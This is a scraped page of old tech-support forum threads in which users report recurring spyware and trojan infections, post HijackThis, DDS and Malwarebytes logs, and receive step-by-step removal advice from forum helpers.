Downloading, Installing, and Running HijackThis

When you return to make your next post, make sure you attach the following logs and that you have run these scans in the following order too (these scans are covered in steps 6 & 7 of the READ & RUN ME sticky)
Bitdefender
Panda Scan
HijackThis

.
 

5 more replies
Relevance 48.79%

Ok I have ran both Ad-Aware and Spybot on a cutsomer's PC. I got everything off, or so it looked like. I reboot and there is about 40 instances of adware/spyware that come right back. Mostly seems to be CoolWWWsearch. It repopulates the "hosts" file also. Then I rebooted and ran both Ad-Aware and Spybot again in safe mode. Ran CWShredder, Cleaned the "hosts" file, and cleaned out all the TEMP directories. Everything checks out in safe mode but when I boot into regualr mode, open IE, and run the spyware removal tools it is right back. Also the "hosts" file keeps getting junked up with bad addresses. I clear them out, save the file, reopen it and they are right back! Here is my HijackThis log and also the "hosts" file showing what keeps repopulating it. Thanks...

Logfile of HijackThis v1.98.2
Scan saved at 6:13:01 PM, on 12/3/2004
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\System32\devldr32.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\HP\Digital Imaging\bin\... Read more

Answer:Spyware keeps coming back...

16 more replies
Relevance 48.79%

Hi,Norton found the virus called Back door greybird.k on C:\windows\G_server_hook.dll.I logged on to the safe mode and deleted the G server. exe and dll file.But Norton keeps finding this virus. How can I clean the virus?Thanks very much. (Moderator edit: moved post to more appropriate forum. jgweed)

Answer:Virus coming back again and again

Symantec Security ResponseI'd recommend submitting a hijackthis log here.How to submit a hijackthis logDownload HijackthisTry running the following from safe mode (Getting to safe-mode) Sysclean you'll also need the virus template file from here lpt***.ziporDrWeb CureITIf your good with the command line also try Sophos Command Line scannerAlso try installing and running A2 Free and EwidoI'd also run Spybot and AdawareIf your using Win2K/XP run adaware/spybot from "safe mode with command prompt"At the C:\ prompt type the following:-cd\C:\progra~1\spybot~1\spybotsd.exe /autocheck /autofixcd\C:\progra~1\lavasoft\ad-awa~1\ad-aware.exe

2 more replies
Relevance 48.79%

Hey, so i've gotten this malware and i know what program caused it but i deleted it and have no clue now, sorry :/ But the main issue is, as i said i cleaned it with Adwcleaner and it finds it and removes it (I'm certain that's it but when i restart chrome it "re-installs" itself. Also I've used FRST but i don't know how useful it will be as i'm puzzled whether it worked or not Now enough from the cryptic talk.

it's under
C:\Users\my user\Appdata\local\google\chrome\user data\default\secure preferences
inside the file (opened with notepad++)
this is the culprit:
plnkhmnoajbfccclonaeepohggeolcih (more details in uploaded logs)
Also, over time due to the popups it also installs some random tinytask thing + uk.ask.com or whatever search provider (also in logs)
Now, as i mentioned above i've checked installed programs and services and found nothing out of the place. I have no clue how the hell should i go about fixing this as its a nasty malware that doesnt wanna get removed. The only sites i found relating to this issue are spanish and the forums even with translate didnt help much so i'm here to ask for some help! Thanks for anything in advance
 

Answer:Malware keeps coming back

Hello,

Your FRST report is empty and you are missing Addition.txt report.
 

9 more replies
Relevance 48.79%

Hi. My problem seems similar to what others have posted, but I know that each system is unique.It seems like I am infected with some sort of malware. I was phished, but my norton symantec caught the trojan. However, now every two or three days the trojan comes back, only there are more and more of the infection. I tried a number of malware removal progams, which frequently find a problem. However, it has not solved the fact the trojan returns again in greater number in two or three days.Thanks.Below is my DDS file:DDS (Ver_2012-10-19.01) - NTFS_AMD64 Internet Explorer: 9.0.8112.16421Run by XXXXXXX at 15:56:52 on 2012-10-31Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.9207.6118 [GMT -4:00].AV: Symantec Endpoint Protection *Enabled/Updated* {88C95A36-8C3B-2F2C-1B8B-30FCCFDC4855}SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}SP: COMODO Defense+ *Enabled/Updated* {FEEA52D5-051E-08DD-07EF-2F009097607D}SP: Symantec Endpoint Protection *Enabled/Updated* {33A8BBD2-AA01-20A2-213B-0B8EB45B02E8}FW: Symantec Endpoint Protection *Enabled* {B0F2DB13-C654-2E74-30D4-99C9310F0F2E}FW: COMODO Firewall *Enabled* {7DB03214-694B-060B-1600-BD4715C36DBB}.============== Running Processes ===============.C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Program Files (x86)\Common Files\Comodo\launcher_service.exeC:\Windows\... Read more

Answer:Trojan keeps coming back

Interestingly, I just ran rkill.exe and the problem returned. So, a number of "tmp" files were created in my users/MYNAME/AppData/Local/Temp folder.

The rkill log was:
Rkill 2.4.3 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2012 BleepingComputer.com
More Information about Rkill can be found at this link:
http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 10/31/2012 09:50:47 PM in x64 mode.
Windows Version: Windows 7 Home Premium Service Pack 1

Checking for Windows services to stop:

* No malware services found to stop.

Checking for processes to terminate:

* No malware processes found to kill.

Checking Registry for malware related settings:

* Explorer Policy Removed: NoActiveDesktopChanges [HKLM]

Backup Registry file created at:
C:\Users\XXXXXXX\Desktop\rkill\rkill-10-31-2012-09-51-01.reg

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

* Windows Defender Disabled

[HKLM\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware" = dword:00000001

* Windows Firewall Disabled

[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = dword:00000000

Checking Windows Service Integrity:

* Windows Defender (WinDefend) is not Running.
Startup Type set to: Manual

* gpsvc =&g... Read more

34 more replies
Relevance 48.79%

I've been on the phone with Microsoft every day since last Monday.
It started with Norton detecting one trojan but not being able to fix it, and a full system scan found over 100 Adwares. After dealing with not being able to open Windows Exp or Internet explorer, I deleted a trojan and spyware in the registry and got adaware and spybot on the system.

However, I keep having problems. As of yesterday,
I have deleted and found again
/Pribi
Backweb
Kenston
two other trojans and a worm that I don't have the names for, but none of them are new.

While on the phone with Msft this morning, I ran a search for Exe files and found Spite6, Tigger, Backdoor and about 26 others that looked suspicious.

The problem is Norton, PestPatrolAV, AVG, Housecall virus scans are not detecting anything other than Adware, which I can't shake off the computer.

I have installed a new firewall and AV software along with pestpatrol.
I have run Adaware and Spybot and here is my hJT log
Logfile of HijackThis v1.99.0
Scan saved at 6:51:25 PM, on 1/6/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\Toolbox\Status... Read more

Answer:Have at least 10 trojans and they keep coming back

bump please
 

3 more replies
Relevance 48.79%

Ok I have ran Ewido, Cleanup, and Killbox and the trojan changed it named on the second log.

PLEASE HELP.... Hijack this file:
Logfile of HijackThis v1.99.1
Scan saved at 8:03:30 PM, on 11/2/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\HPConfig.exe
C:\Program Files\HPQ\Notebook Utilities\HPWirelessMgr.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Common Files\TiVo Shared\Beacon\TiVoBeacon.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\carpserv.exe
C:\Program Files\HPQ\One-Touch\OneTouch.EXE
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Common Files\TiVo Shared\Transfer\TivoTransfer.exe
C:\Program Files\iPod\bin\iPodService.exe... Read more

Answer:Trojan keeps coming back

7 more replies
Relevance 48.79%

I was infected with some Malware, I thought I had gotten rid of it, but It came back and this time it doesn't go away, What should I do? How do I post a Hijack this Log?
 

Answer:Malware Keeps coming back

* Click here to download HJTsetup.exe.
Save HJTsetup.exe to your desktop.

Double click on the HJTsetup.exe icon on your desktop.
By default it will install to C:\Program Files\Hijack This.
Continue to click Next in the setup dialogue boxes until you get to the Select Addition Tasks dialogue.
Put a check by Create a desktop icon then click Next again.
Continue to follow the rest of the prompts from there.
At the final dialogue box click Finish and it will launch Hijack This.
Click on the Do a system scan and save a log file button. It will scan and then ask you to save the log.
Click Save to save the log file and then the log will open in notepad.
Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.
Come back here to this thread and Paste the log in your next reply.
DO NOT have Hijack This fix anything yet. Most of what it finds will be harmless or even required.
 

1 more replies
Relevance 48.79%

Sorry, I had run these scans before I found this forum. I need your expert help.Windows XP with svc pack 3 and all updates. I have been able to get around the malware by running a scan, deleting the infections and corrupt files, but they return at every start up.Latest routine I did was this:ComboFix, then re start; Temp File Cleaner; Malwarebytes, then re-start. Infection still returns.Thursday, AV suite suddenly loaded, I received several cmd line boxes that looked strange and then all Google searches got redirected to shopping sites. Other symptoms are standard stuff, have to re-name anti malware to get it to run, several tries to go to correct site from google, etc.TDSSkiller has been run, GEMR has been run; ComboFix has been run multiple times (logs saved and available); Malwarebytes run multiple time (logs available)ComboFix showsInfectedc:\winnt\system32\ernel32.dllc:\winnt\system32\spool\prtprocs\w32x86\17931u.dllc:\winnt\system32\spool\prtprocs\w32x86\5w555.dllMalWareBytes showsRegistry Data Items Infected:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer (Trojan.DNSChanger) -> Data: 93.188.162.221,93.188.166.201 -> Quarantined and deleted successfully.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\NameServer (Trojan.DNSChanger) -> Data: 93.188.162.221,93.188.166.201 ... Read more

Answer:DNSChanger keeps coming back

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.Double click DeFogger to run the tool. The ap... Read more

3 more replies
Relevance 48.79%

here is the log:

Malwarebytes' Anti-Malware 1.34
Database version: 1823
Windows 5.1.2600 Service Pack 2

3/5/2009 9:18:09 PM
mbam-log-2009-03-05 (21-18-09).txt

Scan type: Quick Scan
Objects scanned: 65386
Time elapsed: 2 minute(s), 2 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\meI6qj75.dll (Trojan.Agent) -> Quarantined and deleted successfully.

Answer:trojan keeps coming back!

Please print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights"Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.Please copy and paste the contents of Report.txt in your next reply.Be sure to renable you anti-virus and and other security programs before connecting to the Internet.-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.

10 more replies
Relevance 48.79%

hello

I have a virus Worm_RBOT.BCQ found on file C:\windows\system32\micront.exe

I have followed to the letter the removal instruction by Trend

I have deleted the file, deleted all Registry reference to this file, deleted all temp files and Bin , all in safe mode..

The virus seems to have been deleted. but when I connect to the net, after a while , virus is detected and all is back to square one..

Please Help!! how can I get rid of this Virus forever....

Thanx
Jadan
 

Answer:virus keeps coming back

10 more replies
Relevance 48.79%

Posting here, as instructed by Orange Blossom.I run Malwarebytes Pro and I recently encountered an infection where all of my Autorun executables were being renamed to have a space before the name and another executable was being put in its place. I manually removed all of these dummy .exe's and searched the entire drive for any other .exe's with the same file size and recent modification date. I removed all I found. I've not run into any further issues similar to this.I originally removed wmpscfgs.exe and js.mui from various folders using MBAM.However, Malwarebytes Pro is popping up daily saying that wmpscfgs is infected in my Internet Explorer directory. Each time, I tell it to quarantine. Rinse, repeat. Malwarebytes continuously pops up down at the bottom of the screen saying 'Malwarebytes has blocked access to a potentially harmful website at 58.240.239.70' or something similar. The popup doesn't stay up long enough for me to get exact wording. (The IP varies, but this is the most recent pop up as of now.)I've scanned with MBAM, SASW, CWShredder... It's still happening and I'm at a bit of a loss as to how to proceed. Any help is greatly appreciated.I am running Windows 7 64 bit. I don't know if GMER just isn't compatible with the OS or what, but I wasn't able to select any of the checkboxes other than Services, Registry, Files, and ADS in addition to the C drive. It found nothing and the ark.log is empty, so I've not uplo... Read more

Answer:wmpscfgs.exe Keeps coming back

Hello , And to the Bleeping Computer Malware Removal Forum. My name is Elise and I'll be glad to help you with your computer problems.I will be working on your malware issues, this may or may not solve other issues you may have with your machine.Please note that whatever repairs we make, are for fixing your computer problems only and by no means should be used on another computer.The cleaning process is not instant. Logs can take some time to research, so please be patient with me. I know that you need your computer working as quickly as possible, and I will work hard to help see that happen. Please reply using the Add/Reply button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply. Only attach them if requested or if they do not fit into the post.Unfortunately, if I do not hear back from you within 5 days, I will be forced to close your topic. If you still need help after I have closed your topic, send me or a moderator a personal message with the address of the thread or feel free to create a new one.You may want to keep the link to this topic in your favorites. Alternatively, you can click the button at the top bar of this topic and Track this Topic, where you can choose email notifications. The topics you are tracking are shown here.-----------------------------------------------------------If you have since resolved the original problem you were having, we would appreciate you let... Read more

81 more replies
Relevance 48.79%

I'm not entirely sure what infection I have here, but I think it has something to do with the Coupon Printer my friend downloaded a while back (I'm cleaning her computer for her)It started out with a bunch of fake AV programs screaming at me to "fix all the infections". I downloaded and installed MBAM, but I couldn't run it until I rebooted in safe mode. It found 8 or 9 items and I cleaned them all. One of them was the following:C:\Users\Haley\AppData\Local\Temp\Low\COUPON~1.DLLEvery time I restart the computer and re-run MBAM, that same file shows up, no matter how many times I've tried to delete it.I thought I had fixed all the nasties because the fake AV is now gone, but I'm not so sure anymore. I'm pretty good at malware removal, but not great, so I thought I'd ask you guys to take a look.Thanks!!DDS (Ver_10-03-17.01) - NTFSx86 Run by Haley at 0:15:15.58 on Tue 05/11/2010Internet Explorer: 7.0.6001.18000 BrowserJavaVersion: 1.6.0_13Microsoft? Windows Vista? Home Premium 6.0.6001.1.1252.1.1033.18.3034.1804 [GMT -6:00]SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}============== Running Processes ===============C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\svchost.exe -k rpcssc:\Program Files\Microsoft Security Ess... Read more

Answer:Malware that keeps coming back

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

12 more replies
Relevance 48.79%

Hi, So I have this virus. Everytime the windows start, and if its connected to the internet before anti malware malwarebytes protection on, It will start downloading virus like crazy. MBAM can limit the virus somehow, but it still somehow allowed wuaucldt.exe and VRT***.tmp (*** is random number) and sometimes some random dll files. I also got random number dot exe and it contain w.exe, d.bin, ms.bin, so.bin. All of this happened if i connect to the internet and worse if there is no MBAM protection. I tried to remove it through registry and hijackthis, it just keep coming back. Make me think that all my exe files has been infected.I sent winlogon.exe to several online file scanner and apparently has Virut on it.I tried to use DDS.scr, but i keep getting error (0xc0000142). I tried to rename it lots of time with any name that i can think of and still the same problem. I tried to rename the file name into bat or exe, same problem.ComboFix also has the same (0xc0000142) error. Gmer works, but it keeps going to the blue screen everytime I scanned a lil longer (say more than 2 minutes). So I uncheck registry and files to make it faster. Here's the log.I also attached hijackthis log if needed. Oh, I use Windows 7, and updated MBAM.Thank you so much. Sorry for my English. I really really appreciate it.PS : Sorry for repost. I don't know why the logs is not appear in the previous post.Just in case if the log dissapear again, i copy it to here :GMER 1.0.15.15281 - http://www.... Read more

Answer:wuaucldt.exe keeps coming back

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

10 more replies
Relevance 48.79%

I have already been through the "Am I Infected" forum and I am sure that I am but I don't know how or with what. Topic referenced is here: http://www.bleepingcomputer.com/forums/t/305217/security-breach/ ~ OB We have run MBAM and GMER and removed some infections and the next day when I ran my Spyware Doctor, I was reinfected with two new infections. Already identified them as keyloggers and one was some type of autodialer. Anyway, I was told to run a DDS and post it here. Time for an operation, I guess. LOL I am hoping to learn something from the process. I have already learned a lot just reading and researching on my own before I broke down and came to bleepingcomputer for help. I know when something is over my head and whatever this is.....is it! Thank you so kindly for the help! Here is the DDS. I did run a GMER last night but for some reason, my system had crashed when I returned the computer so I did not have the results. If you would like for me to run another one, please advise and I will do it ASAP. DDS (Ver_10-03-17.01) - NTFSx86 Run by Compaq_Owner at 0:48:56.29 on Sun 04/04/2010Internet Explorer: 7.0.5730.11Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.503.191 [GMT -4:00]AV: Spyware Doctor with AntiVirus *On-access scanning enabled* (Updated) {D3C23B96-C9DC-477F-8EF1-69AF17A6EFF6}============== Running Processes ===============C:\WINDOWS\system32\svchost -k DcomLaunchC:\WINDOWS\system32\svchost -k rpcssC:\WINDOWS\System32\svchost.ex... Read more

Answer:Malware keeps coming back.

Hello and and Welcome to BleepingcomputerPlease note we are very busy, so if I don't hear from you within 5 days the topic will be closed, If you have sinceresolved your issues I would appreciate if you would let me no so I can close this topic.We need to create an OTL ReportPlease download OTL from one of the following mirrors:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.Under the Custom Scans/Fixes box at the bottom, paste in the following bold text.%SYSTEMDRIVE%\*.exe/md5starteventlog.dllscecli.dllnetlogon.dllcngaudit.dllsceclt.dllntelogon.dlllogevent.dlliaStor.sysnvstor.sysatapi.sysIdeChnDr.sysviasraid.sysAGP440.sysvaxscsi.sysnvatabus.sysviamraid.sysnvata.sysnvgts.sysiastorv.sysViPrt.sys/md5stopCREATERESTOREPOINTPush the button.Two reports will open, copy and paste them in a reply here:OTL.txt <-- Will be openedExtra.txt <-- Will be minimizedThanks

42 more replies
Relevance 48.79%

I keep getting a weird virtumonde that keeps coming back. I scan SpyBot and it deletes it fine, but after a few days its there again. One time I tried not visiting anything online for 2 days and it still came back. It keeps trying to load a .dll in the startup as a weird file name, mainly 'aasdfhfds' or 'wlwklaja'Virtumonde.prx: [SBI $B6BF2145] Autorun settings (Rqeqoku) (Registry value, fixed) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RqeqokuThis was the file that was removed using SpyBot. I also have an attached HijackThis log, if anyone would be willing to help.Logfile of Trend Micro HijackThis v2.0.3 (BETA)Scan saved at 12:21:50 AM, on 2/18/2010Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18702)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Dell AIO Printer A920\dlbkbmgr.exeC:\Program Files\Dell AIO Printer A920\dlbkbmon.exeC:\Program Files\Microsoft ActiveSync\Wcescomm.exeC:\PROGRA~1\MICROS~3\rapimgr.exeC:\Program Files\CDBurnerXP\NMSAccessU.exeC:\WINDOWS\system32\sv... Read more

Answer:Virtumonde.prx keeps coming back

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.We need to create an OTL ReportPlease download OTL from one of the following mirrors:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.In the custom scan box paste the following:CODEnetsvcsmsconfigsafebootminimalsafebootnetworkactivexdrivers32%systemroot%�... Read more

2 more replies
Relevance 48.79%

Vundo Keeps coming back

OS:Windows XP, SP3

Hi,
I was forwarded from "http://www.bleepingcomputer.com/forums/t/203107/after-windows-update-multiple-program-errors-pc-restarting-on-its-own/" to post here.... That thread kinda died... anyway...

Over the past month I've found multiple instances of Vundo, and things seem to be getting worse.
Every time I try to clean my system, Vundo keeps coming back - even if I dont do any browsing.
Most recently, i've been experiencing applications freezing (Firefox, McAfee, Warcraft3)
The system has also crashed mid-scan using McAfee several times, but not lately.
I'm unsure if these problems are related to the Virus or other system issues - I figure get rid of the virus first and troubleshoot the rest later.
My system is fairly new (Dec 08), it came with McAfee Enterprise installed. I also installed the free version of Spyware Doctor on my computer.
Neither of which seem to be able to remove the Virus, and at times can not even detect it.

I've started to notice that sometimes McAfee is disabled after restarting the computer; I hadn't changed any settings for that to occur.

I've tried using Malwarebytes Anti-Malware as well as SUPER Anti-Spyware, both of which are doing a better job of finding and clearing traces of the virus (compared to McAfee). Also tried VirtumundoBeGone and in haste, ComboFix.

VirtumundoBeGone found no traces, and Combofix didnt do anything noticable.

Please help!
Let me know if there are any logs or reports you ... Read more

Answer:Vundo Keeps coming back, not sure what to do

Well the best we can do is get an MBAM and perhaps a SUPER Anti-Spyware log to start with.Open MBAM in normal mode and click Update tab, select Check for Updates,when doneclick Scanner tab,select Quick scan and scan.After scan click Remove Selected, Post new scan log and Reboot into normal mode.

3 more replies
Relevance 48.79%

so i didn't have this problem before and i JUST upgraded to SP2 via windows update and the installation went normal.everything seems to work fine but there's this program that i wasn't sure about that popped up as an alert from ZoneAlarm: MSNNOED.exe. i tried to google to see if this was a legit file but i couldn't find anything so i click no to not allow it to access the internet.i ran my virus checker and it didn't pick up anything. but when i ran malewarebytes with the most recent update, it found 3 "infected" files, one of which was the MSNNOED.exe and malewarebytes says it's a trojan agent. also it finds a comsa32.sys file which it deems as a trojan agent. when i search for that MSNNOED.exe file on my computer, it's in the WINDOWS\SYSTEM32 directory and there's another file in the Prefetch directory: MSNNOED.EXE-05ABE18F.pfnot sure what they are but malewarebytes quarantines them and removes them but requires a restart, which i do. when i restart and load back up, everything is fine and the file is supposedly gone (meaning when i try doing a search, MSNNOED.exe isn't there anymore as well as the other files). but when i try to open up task manager to see if it really is, shortly afterward i get an alert from ZoneAlarm saying do i want to let MSNNOED.exe access the internet. i click no. i do a search on my system again and sure enough, those same files are back there. is there a "hidden" program that... Read more

Answer:MSNNOED.exe keeps coming back

i found something that problem might work here: http://www.bleepingcomputer.com/forums/t/178477/win32refpro/this person had the same issue that i'm having now i'm thinking. the only difference is that in my HJT log, i see an MSCNCO.exe running in my SYSTEM32 directory which probably is running the MSNNEOD.exe file. i have an entry that says: O23 - Service: Ms Database Manager Service (mscncosd) - Unknown Owner - C\WINDOWS\SYSTEM32\mscnco.exethe only problem is i can't delete this file because it says it's in use. i haven't done combofix, as i'm not sure how to use it and am awaiting your help. supposedly that's the file causing the loading of the other files, according to that person who posted in the link i provided.please advise. thanks!!

2 more replies
Relevance 48.79%

Ok i'v been fixin my computer for 2 weeks and 3 days now and I will not reinstall my wondows untill I fix it

I ran NOrton anti virus 2004 in safe mode
I also ran it in diagnostic startup
I have updated virus definitions
After norton got done 1 file could not be deleted so I delete it manually
Then I ran hijackthis and I fixed all aboutblank
trust me I fixed all the bad things
Then I ran SWSHREDDER and it found Searchx which it deleted
Then I ran spybot search and destroy 1.3
Adaware with updated definitons
and Spysweeper
Only Spybot which I ran second found Webdialer and could not delete it
so I deleted it manually
then I went into registry into all possible IE files under
software/michrosoft/ie/main and deleted all the files that had anything to do with Searchx (after working on it for 2 weeks I know exactlly what is what)

Then I ran everything over again and everything returned nothing
means my computer is clear

so I go online and I type blahblah.con since I figured that when I go to a not existing page the god damned pop up comes back
oh before this I changed all my default serach pages to google.com
and guess what it came back


NO N00b advice please I tried everything that is noobish
I also noticed that the dll file in windows/system32 that is causing this trouble once found by norton anti virus cannot be deleted until restart and by that time it makes a copy of it self under some dumb name like (so far it was called this)
noob.dll
cnn.dll
clan.... Read more

Answer:Searchx keeps coming back WTF am I TO DO?

Two weeks and three days, I would have used Fdisk by then.
Sometimes is best to toss in the towel, or in this case, the floppy!
or CD if 2k or xp.
 

10 more replies
Relevance 48.79%

I was attacked by spyware a month or so ago, I was able to remove most of it on my own using AVG anti-spyware, killbox, hijack this, and some registry fixes. I am currently using AVG to guard my system, but some of the problems keep coming back again and again. Namely, tiny.id (xoasonqc.exe in the system32 folder) and trojan.agent.aoy (tnypwspg.exe) also, hjy.dll and gebyawv.dll which is particularly irritating, as AVG pops up that it finds it at least twice every boot up. Right now, I have been quarantee-ing the files as it seems when I set to "permanently remove" they came back quicker. In the infections log of AVG, gebyawv is listed at least twenty times. Since the attack I have noticed other quirks such as pages not loading correctly in Netscape 9, seemingly slower operation when launching programs (some perhaps due to system resources taken up by AVG and A squared which now run in background). Please let me know if I can completely elimate this problems and restore my system to it's former operating conditions.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:49:19 PM, on 12/1/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
